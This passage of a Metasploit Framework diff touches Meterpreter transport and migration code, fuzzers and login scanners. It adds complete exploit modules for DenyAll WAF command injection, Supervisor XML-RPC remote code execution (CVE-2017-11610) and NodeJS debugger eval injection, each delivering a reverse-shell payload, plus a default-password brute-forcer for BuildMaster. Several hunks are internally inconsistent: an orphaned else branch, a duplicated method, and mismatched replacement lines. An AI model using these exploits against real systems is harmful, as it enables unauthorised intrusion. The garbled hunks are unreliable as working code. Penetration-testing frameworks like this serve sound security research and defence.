    request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
@ -722,11 +676,8 @@ class ClientCore < Extension
  # Indicates if the given transport is a valid transport option.
  #
  def valid_transport?(transport)
-    if transport
+    return false if transport.nil?
-      VALID_TRANSPORTS.has_key?(transport.downcase)
+    VALID_TRANSPORTS.include?(transport.downcase)
    else
      false
    end
  end
  #
@ -830,11 +781,11 @@ private
      opts[:lhost] = nil
    end
-    transport = VALID_TRANSPORTS[opts[:transport]]
+    transport = opts[:transport].downcase
    request = Packet.create_request(method)
-    scheme = opts[:transport].split('_')[1]
+    scheme = transport.split('_')[1]
    url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
    if opts[:luri] && opts[:luri].length > 0
@ -864,7 +815,7 @@ private
    end
    # do more magic work for http(s) payloads
-    unless opts[:transport].ends_with?('tcp')
+    unless transport.ends_with?('tcp')
      if opts[:uri]
        url << '/' unless opts[:uri].start_with?('/')
        url << opts[:uri]
@ -878,7 +829,7 @@ private
      opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
      request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
-      if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
+      if transport == 'reverse_https' && opts[:cert]
        hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert])
        request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
      end
@ -902,24 +853,7 @@ private
    request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
    request.add_tlv(TLV_TYPE_TRANS_URL, url)
-    return request
+    request
  end
  #
  # Create a full migration payload specific to the target process.
  #
  def generate_migrate_payload(target_process)
    case client.platform
    when 'windows'
      blob = generate_migrate_windows_payload(target_process)
    when 'linux'
      blob = generate_migrate_linux_payload
    else
      raise RuntimeError, "Unsupported platform '#{client.platform}'"
    end
    blob
  end
  #
@ -945,34 +879,18 @@ private
  end
  #
-  # Create a full Linux-specific migration payload specific to the target process.
+  # Create a full migration payload specific to the target process.
  #
-  def generate_migrate_linux_payload
+  def generate_migrate_payload(target_process)
-    MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
+    case client.platform
-  end
+    when 'windows'
-
+      blob = generate_migrate_windows_payload(target_process)
-  #
+    else
-  # Determine the elf entry poitn for the given payload.
+      raise RuntimeError, "Unsupported platform '#{client.platform}'"
  #
  def elf_ep(payload)
    elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
    ep = elf.elf_header.e_entry
    return ep
  end
  #
  # Get the tmp folder for the session.
  #
  def tmp_folder
    tmp = client.sys.config.getenv('TMPDIR')
    if tmp.to_s.strip.empty?
      tmp = '/tmp'
    end
-    tmp
+    blob
  end
 end
 end; end; end
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
@ -170,10 +170,7 @@ class Config
    ret = []
    res = client.send_request(req)
    res.each(TLV_TYPE_PRIVILEGE) do |p|
-      ret << {
+      ret << p.value
        priv:    p.get_tlv_value(TLV_TYPE_PRIVILEGE_NAME),
        enabled: p.get_tlv_value(TLV_TYPE_PRIVILEGE_ENABLED),
      }
    end
    ret
  end
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@ -16,9 +16,7 @@ TLV_TYPE_HANDLE             = TLV_META_TYPE_QWORD   |  600
 TLV_TYPE_INHERIT            = TLV_META_TYPE_BOOL    |  601
 TLV_TYPE_PROCESS_HANDLE     = TLV_META_TYPE_QWORD   |  630
 TLV_TYPE_THREAD_HANDLE      = TLV_META_TYPE_QWORD   |  631
-TLV_TYPE_PRIVILEGE          = TLV_META_TYPE_GROUP   |  632
+TLV_TYPE_PRIVILEGE          = TLV_META_TYPE_STRING  |  632
 TLV_TYPE_PRIVILEGE_NAME     = TLV_META_TYPE_STRING  |  633
 TLV_TYPE_PRIVILEGE_ENABLED  = TLV_META_TYPE_BOOL    |  634
 ##
 #
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@ -142,7 +142,7 @@ class Console::CommandDispatcher::Core
    print_line(@@pivot_opts.usage)
    print_line
    print_line('Supported pivot types:')
-    print_line('     - pipe (using named pipes over SMB)') 
+    print_line('     - pipe (using named pipes over SMB)')
    print_line('Supported arhiectures:')
    @@pivot_supported_archs.each do |a|
      print_line('     - ' + a)
@ -757,7 +757,7 @@ class Console::CommandDispatcher::Core
  # Arguments for transport switching
  #
  @@transport_opts = Rex::Parser::Arguments.new(
-    '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"],
+    '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"],
    '-l' => [true, 'LHOST parameter (for reverse transports)'],
    '-p' => [true, 'LPORT parameter'],
    '-i' => [true, 'Specify transport by index (currently supported: remove)'],
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@ -899,12 +899,12 @@ class Console::CommandDispatcher::Stdapi::Sys
      'Header'    => 'Enabled Process Privileges',
      'Indent'    => 0,
      'SortIndex' => 1,
-      'Columns'   => ['Priv Name', 'Enabled']
+      'Columns'   => ['Name']
    )
    privs = client.sys.config.getprivs
    client.sys.config.getprivs.each do |priv|
-      table << [priv[:priv], priv[:enabled].to_s]
+      table << [priv]
    end
    print_line
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@ -191,9 +191,9 @@ class Client
  # Closes the connection to the remote server.
  #
  def close
-    if (self.conn)
+    if self.conn && !self.conn.closed?
      self.conn.shutdown
-      self.conn.close unless self.conn.closed?
+      self.conn.close
    end
    self.conn = nil
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
  # are needed when there's no database
  spec.add_runtime_dependency 'metasploit-model'
  # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.3.7'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.3.8'
  # Needed for the next-generation POSIX Meterpreter
  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2'
  # Needed by msfgui and other rpc components
--- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb
+++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb
@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
    @versions.each do |version|
      print_status("#{host}:#{rport} fuzzing version #{version} control messages (mode 6)")
      @mode_6_operations.each do |op|
-        request = Rex::Proto::NTP.ntp_control(version, op)
+        request = Rex::Proto::NTP.ntp_control(version, op).to_binary_s
        what = "#{request.size}-byte version #{version} mode 6 op #{op} message"
        vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}")
        responses = probe(host, datastore['RPORT'].to_i, request)
@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary
      print_status("#{host}:#{rport} fuzzing version #{version} private messages (mode 7)")
      @mode_7_implementations.each do |implementation|
        @mode_7_request_codes.each do |request_code|
-          request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188)
+          request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188).to_binary_s
          what = "#{request.size}-byte version #{version} mode 7 imp #{implementation} req #{request_code} message"
          vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}")
          responses = probe(host, datastore['RPORT'].to_i, request)
@ -164,6 +164,7 @@ class MetasploitModule < Msf::Auxiliary
          # TODO: is there a better way to pick this size?  Should more than one be tried?
          request.payload = SecureRandom.random_bytes(16)
        end
        request = request.to_binary_s
        what = "#{request.size}-byte #{short ? 'short ' : nil}version #{version} mode #{mode} message"
        vprint_status("#{host}:#{rport} probing with #{what}")
        responses = probe(host, datastore['RPORT'].to_i, request)
--- a/modules/auxiliary/gather/emc_cta_xxe.rb
+++ b/modules/auxiliary/gather/emc_cta_xxe.rb
@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('SSLVersion', [true, 'SSL version', 'TLS1']),
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
-      ])
+      ]
    )
  end
  def run
--- a/modules/auxiliary/scanner/http/buildmaster_login.rb
+++ b/modules/auxiliary/scanner/http/buildmaster_login.rb
@ -0,0 +1,96 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Inedo BuildMaster Login Scanner',
      'Description' => %{
          This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'
          which has the default password 'Admin'.
      },
      'Author'         => [ 'James Otten <jamesotten1[at]gmail.com>' ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'VERBOSE' => true })
    )
    register_options(
      [
        Opt::RPORT(81),
        OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),
        OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])
      ]
    )
  end
  def run_host(ip)
    return unless buildmaster?
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end
  def buildmaster?
    begin
      res = send_request_cgi('uri' => '/log-in')
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      print_error("#{peer} - HTTP Connection Failed")
      return false
    end
    if res && res.code == 200 && res.body.include?('BuildMaster_Version')
      version = res.body.scan(%r{<span id="BuildMaster_Version">(.*)</span>}).flatten.first
      print_good("#{peer} - Identified BuildMaster #{version}")
      return true
    else
      print_error("#{peer} - Application does not appear to be BuildMaster")
      return false
    end
  end
  def login_succeeded?(res)
    if res && res.code == 200
      body = JSON.parse(res.body)
      return body.key?('succeeded') && body['succeeded']
    end
    false
  rescue
    false
  end
  def do_login(user, pass)
    print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
    begin
      res = send_request_cgi(
        {
          'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',
          'method' => 'POST',
          'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
          'vars_post' =>
            {
              'userName' => user,
              'password' => pass
            }
        }
      )
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      vprint_error("#{peer} - HTTP Connection Failed...")
      return :abort
    end
    if login_succeeded?(res)
      print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
      store_valid_credential(user: user, private: pass)
    else
      print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
    end
  end
 end
--- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb
+++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb
@ -13,23 +13,18 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::AuthBrute
  def initialize
-  super(
+    super(
-    'Name'        => 'Nessus NTP Login Utility',
+      'Name'        => 'Nessus NTP Login Utility',
-    'Description' => 'This module attempts to authenticate to a Nessus NTP service.',
+      'Description' => 'This module attempts to authenticate to a Nessus NTP service.',
-    'Author'         => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
+      'Author'      => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
-    'License'        => MSF_LICENSE
+      'License'     => MSF_LICENSE
-  )
+    )
-  register_options(
+    register_options(
-    [
+      [
-      Opt::RPORT(1241),
+        Opt::RPORT(1241),
-      OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
+        OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users")
-    ])
+      ]
-
+    )
  register_advanced_options(
  [
    OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
    OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
  ])
  end
  def run_host(ip)
--- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::AuthBrute
  def initialize
-  super(
+    super(
-    'Name'        => 'OpenVAS OMP Login Utility',
+      'Name'        => 'OpenVAS OMP Login Utility',
-    'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.',
+      'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.',
-    'Author'         => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
+      'Author'      => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
-    'License'        => MSF_LICENSE
+      'License'     => MSF_LICENSE
-  )
+    )
-  register_options(
+    register_options(
-    [
+      [
-      Opt::RPORT(9390),
+        Opt::RPORT(9390),
-      OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
+        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
-    ])
+      ]
-
+    )
  register_advanced_options(
  [
    OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
    OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
  ])
  end
  def run_host(ip)
--- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::AuthBrute
  def initialize
-  super(
+    super(
-    'Name'        => 'OpenVAS OTP Login Utility',
+      'Name'        => 'OpenVAS OTP Login Utility',
-    'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.',
+      'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.',
-    'Author'         => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
+      'Author'      => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
-    'License'        => MSF_LICENSE
+      'License'     => MSF_LICENSE
-  )
+    )
-  register_options(
+    register_options(
-    [
+      [
-      Opt::RPORT(9391),
+        Opt::RPORT(9391),
-      OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
+        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
-    ])
+      ]
-
+    )
  register_advanced_options(
  [
    OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
    OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
  ])
  end
  def run_host(ip)
--- a/modules/auxiliary/scanner/smb/smb1.rb
+++ b/modules/auxiliary/scanner/smb/smb1.rb
@ -0,0 +1,76 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Auxiliary
  # Exploit mixins should go first
  include Msf::Exploit::Remote::Tcp
  # Scanner mixin should be near last
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT  = Rex::Proto::SMB::Exceptions
  CONST  = Rex::Proto::SMB::Constants
  def initialize
    super(
      'Name'        => 'SMBv1 Protocol Detection',
      'Description' => 'Detect systems that support the SMBv1 protocol',
      'Author'      => 'Chance Johnson @loftwing',
      'License'     => MSF_LICENSE
    )
    register_options([ Opt::RPORT(445) ])
  end
  # Modified from smb2 module by @hdm
  # Fingerprint a single host
  def run_host(ip)
    begin
      connect
      # Only accept NT LM 0.12 dialect and WfW3.0
      dialects = ['PC NETWORK PROGRAM 1.0',
                  'LANMAN1.0',
                  'Windows for Workgroups 3.1a',
                  'LM1.2X002',
                  'LANMAN2.1',
                  'NT LM 0.12']
      data     = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
      pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
      pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
      pkt['Payload']['SMB'].v['Flags1'] = 0x08
      pkt['Payload']['SMB'].v['Flags2'] = 0xc801
      pkt['Payload'].v['Payload']       = data
      pkt['Payload']['SMB'].v['ProcessID']     = rand(0x10000)
      pkt['Payload']['SMB'].v['MultiplexID']   = rand(0x10000)
      sock.put(pkt.to_s)
      res = sock.get_once
      # expecting \xff instead of \xfe
      if res && res.index("\xffSMB")
        print_good("#{ip} supports SMBv1 dialect.")
        report_note(
          host: ip,
          proto: 'tcp',
          sname: 'smb1',
          port: rport,
          type: "supports SMB 1"
        )
      end
    rescue ::Rex::ConnectionError
    rescue EOFError
    rescue Errno::ECONNRESET
    rescue ::Exception => e
      print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}")
    ensure
      disconnect
    end
  end
 end
--- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
@ -124,11 +124,15 @@ class MetasploitModule < Msf::Auxiliary
        )
      end
-    rescue ::Rex::ConnectionError
+    rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
      print_error("A network issue has occurred: #{e.message}")
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    rescue Timeout::Error
      print_error("#{target_host}:#{rport} Timed out after #{to} seconds")
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    rescue ::Exception => e
      print_error("#{target_host}:#{rport} Error: #{e} #{e.backtrace}")
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    ensure
      disconnect
    end
--- a/modules/exploits/linux/http/denyall_waf_exec.rb
+++ b/modules/exploits/linux/http/denyall_waf_exec.rb
@ -0,0 +1,103 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => "DenyAll Web Application Firewall Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
        terminal command under the context of the web server user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => true,
          'RPORT' => 3001,
          'Payload'  => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 19 2017",
      'DefaultTarget'  => 0
    ))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
      ]
    )
  end
  def get_token
    # Taking token by exploiting bug on first endpoint.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
      'vars_get' => {
        'applianceUid' => 'LOCALUID',
        'typeOf' => 'debug'
      }
    })
    if res && res.code == 200 && res.body.include?("iToken")
      res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
    else
       nil
    end
  end
  def check
    # If we've managed to get token, that means target is most likely vulnerable.
    token = get_token
    if token.nil?
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Appears
    end
  end
  def exploit
    # Get iToken from unauthenticated accessible endpoint
    print_status('Extracting iToken value')
    token = get_token
    if token.nil?
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    else
      print_good("Awesome. iToken value = #{token}")
    end
    # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
    print_status('Trigerring command injection vulnerability with iToken value.')
    r = rand_text_alpha(5 + rand(3));
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
      'vars_post' => {
        'iToken' => token,
        'tag' => 'tunnel',
        'stime' => r,
        'type' => "#{r}$(python -c \"#{payload.encoded}\")"
        }
    })
  end
 end
--- a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb
+++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb
@ -0,0 +1,169 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Supervisor XML-RPC Authenticated Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
        can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
        The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
        may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
        configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Calum Hutton <c.e.hutton@gmx.com>'
        ],
      'References'     =>
        [
          ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
          ['URL', 'https://www.debian.org/security/2017/dsa-3942'],
          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],
          ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
          ['CVE', '2017-11610']
        ],
      'Platform'       => 'linux',
      'Targets'        =>
        [
          ['3.0a1-3.3.2', {}]
        ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'DefaultOptions' =>
        {
          'RPORT'         => 9001,
          'Payload'       => 'linux/x64/meterpreter/reverse_tcp',
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 19 2017',
      'DefaultTarget'  => 0
    ))
    register_options(
      [
        Opt::RPORT(9001),
        OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
        OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
        OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
      ]
    )
  end
  def check_version(version)
    if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
      return true
    else
      return false
    end
  end
  def check
    print_status('Extracting version from web interface..')
    params = {
      'method'    => 'GET',
      'uri'       => normalize_uri('/')
    }
    if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
      print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
      params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
    end
    res = send_request_cgi(params)
    if res
      if res.code == 200
        match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
        if match
          version = Gem::Version.new(match[1])
          if check_version(version)
            print_good("Vulnerable version found: #{version}")
            return Exploit::CheckCode::Appears
          else
            print_bad("Version #{version} is not vulnerable")
            return Exploit::CheckCode::Safe
          end
        else
          print_bad('Could not extract version number from web interface')
          return Exploit::CheckCode::Unknown
        end
      elsif res.code == 401
        print_bad("Authentication failed: #{res.code} response")
        return Exploit::CheckCode::Safe
      else
        print_bad("Unexpected HTTP code: #{res.code} response")
        return Exploit::CheckCode::Unknown
      end
    else
      print_bad('Error connecting to web interface')
      return Exploit::CheckCode::Unknown
    end
  end
  def execute_command(cmd, opts = {})
    # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
    # Credit to the following urls for the os.system() payload
    # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
    # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
    xml_payload = %{<?xml version="1.0"?>
 <methodCall>
  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
  <params>
    <param>
      <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>
    </param>
  </params>
 </methodCall>}
    # Send the XML-RPC payload via POST to the specified endpoint
    endpoint_path = target_uri.path
    print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")
    params = {
      'method'        => 'POST',
      'uri'           => normalize_uri(endpoint_path),
      'ctype'         => 'text/xml',
      'headers'       => {'Accept' => 'text/xml'},
      'data'          => xml_payload,
      'encode_params' => false
    }
    if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
      print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
      params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
    end
    return send_request_cgi(params, timeout=5)
  end
  def exploit
    res = execute_cmdstager(:linemax => 800)
    if res
      if res.code == 401
        fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
      elsif res.code == 404
        fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
      else
        fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
      end
    else
      print_good('Request returned without status code, usually indicates success. Passing to handler..')
      handler
    end
  end
 end
--- a/modules/exploits/multi/misc/nodejs_v8_debugger.rb
+++ b/modules/exploits/multi/misc/nodejs_v8_debugger.rb
@ -0,0 +1,90 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  MESSAGE_HEADER_TEMPLATE   = "Content-Length: %{length}\r\n\r\n"
  def initialize(info={})
    super(update_info(info,
      'Name'           => "NodeJS Debugger Command Injection",
      'Description'    => %q{
        This module uses the "evaluate" request type of the NodeJS V8
        debugger protocol (version 1) to evaluate arbitrary JS and
         call out to other system commands. The port (default 5858) is
        not exposed non-locally in default configurations, but may be
        exposed either intentionally or via misconfiguration.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
      'References'     =>
        [
          [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
          [ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
        ],
      'Targets'        =>
        [
          ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 15 2016",
      'DefaultTarget'  => 0)
    )
    register_options(
      [
        Opt::RPORT(5858)
      ])
  end
  def make_eval_message
    msg_body = { seq: 1,
                 type: 'request',
                 command: 'evaluate',
                 arguments: { expression: payload.encoded,
                              global: true,
                              maxStringLength:-1
                            }
                }.to_json
    msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
    msg_header + msg_body
  end
  def check
    connect
    res = sock.get_once
    disconnect
    if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
      vprint_status("Got debugger handshake:\n#{res}")
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Unknown
  end
  def exploit
    connect
    # must consume incoming handshake before sending payload
    buf = sock.get_once
    msg = make_eval_message
    print_status("Sending #{msg.length} byte payload...")
    vprint_status("#{msg}")
    sock.put(msg)
    buf = sock.get_once
    if buf.include? '"command":"evaluate","success":true'
      print_status("Got success response")
    elsif buf.include? '"command":"evaluate","success":false'
      print_error("Got failure response: #{buf}")
    else
      print_error("Got unexpected response: #{buf}")
    end
  end
 end
--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
        rendering engine. It is possible to redirect the output of a XSLT
        transformation to an arbitrary file. The content of the created file must be
        ASCII or UTF-8. The destination path can be relative or absolute. This module
-        has been tested on Safari and Maxthon. Code execution can be acheived by first
+        has been tested on Safari and Maxthon. Code execution can be achieved by first
        uploading the payload to the remote machine in VBS format, and then upload a MOF
        file, which enables Windows Management Instrumentation service to execute the VBS.
      },
--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
    super( update_info(info,
      'Name'           => 'TeeChart Professional ActiveX Control Trusted Integer Dereference',
      'Description'    => %q{
-          This module exploits a integer overflow in TeeChart Pro ActiveX control. When
+          This module exploits an integer overflow in TeeChart Pro ActiveX control. When
        sending an overly large/negative integer value to the AddSeries() property of
-        TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the
+        TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the
        value and is later directly trusted and called upon.
        This module has been designed to bypass DEP only under IE8 with Java support. Multiple
--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
        ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect
